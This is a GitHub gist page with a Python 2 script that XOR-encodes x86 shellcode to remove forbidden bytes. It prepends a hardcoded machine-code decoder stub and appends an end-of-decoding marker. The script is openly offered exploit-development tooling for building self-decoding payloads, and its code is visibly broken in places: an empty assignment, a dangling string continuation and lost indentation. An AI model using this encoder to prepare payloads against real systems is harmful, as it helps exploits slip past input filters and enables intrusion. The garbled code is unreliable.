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Created March 22, 2016 17:58
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Save mgeeky/db1c664f2e13ffa646ba to your computer and use it in GitHub Desktop.
x86 Shellcode XOR-based encoder intended to do away forbidden chars. Came handy to me several times :-)
# This script reads binary file specified in first
# parameter and then encodes every byte by simply
# XORing it with custom value (specified in second param)
# and writes output to another file.
# If second parameter wasn't specified (i.e XOR argument)
# then 0xAA is taken by default. In addition it prepends shellcode
# with simple decoding routine and appends decode-end marker
# if needed.
import sys
import struct
from random import randint
XOR = 0xAA
if len(sys.argv) < 2:
print "Usage: <shellcode> <XOR> [-s] [-f]"
print "\t-s - prevents appending/prepending shellcode with anything"
print "\t-f - force using selected key"
prev = 0
force = 0
if len(sys.argv) > 3:
XOR = int(sys.argv[2],16)
if len(sys.argv) == 4:
if sys.argv[3] == '-s':
prev = 1
elif sys.argv[3] == '-f':
force = 1
if len(sys.argv) == 5:
if sys.argv[4] == '-s':
prev = 1
elif sys.argv[4] == '-f':
force = 1
f = open(sys.argv[1], 'rb')
bin =
print "[+] Input read: %d bytes." % len(bin)
# Checking if this XOR value can be used
fa = False
while True:
f = False
for a in bin:
byte = struct.unpack("B", a)[0]
if byte == XOR and force == 0:
if fa == False:
print "[!] Value 0x%02X cannot be used as a XOR value\n"\
"\tbecause it occures in input file (xor will " \
"result with 00)" % XOR
fa = True
if len(sys.argv) == 3:
XOR = randint( 1, 255)
print "\t- trying with 0x%02X..." % XOR
f = True
if f:
bAppendMarker = False
if bin[-4:] != "\xDE\xC0\xDE\xAB":
bAppendMarker = True
file = sys.argv[1][:-4]+"_enc"+sys.argv[1][-4:]
g = open(file, 'wb')
print "[+] XORing each byte by 0x%02X" % XOR
decode = "\xEB\x12\x5B\x89\xDA\x80\x33"
decode += struct.pack("B", XOR)
decode += "\x43\x81\x7B\xFC\xDE\xC0\xDE\xAB" \
"\x75\xF3\xFF\xE2\xE8\xE9\xFF\xFF" \
if prev == 0:
print "[+] Shellcode is being prepended with %d bytes "\
"of decode routine" % len(decode)
for a in bin:
# XORing
b = struct.unpack("B", a)[0]
byte = b ^ XOR
g.write(struct.pack("B", int(byte)))
if bAppendMarker == True and prev == 0:
b1 = 0xAB ^ XOR
b2 = 0xDE ^ XOR
b3 = 0xC0 ^ XOR
b4 = 0xDE ^ XOR
g.write(struct.pack("BBBB", b4,b3,b2,b1 ))
print "[+] Appending 0x%02X%02X%02X%02X (0xABDEC0DE) " \
"end-of-decoding marker" % (b1,b2,b3,b4)
print "[+] %s generated." % file
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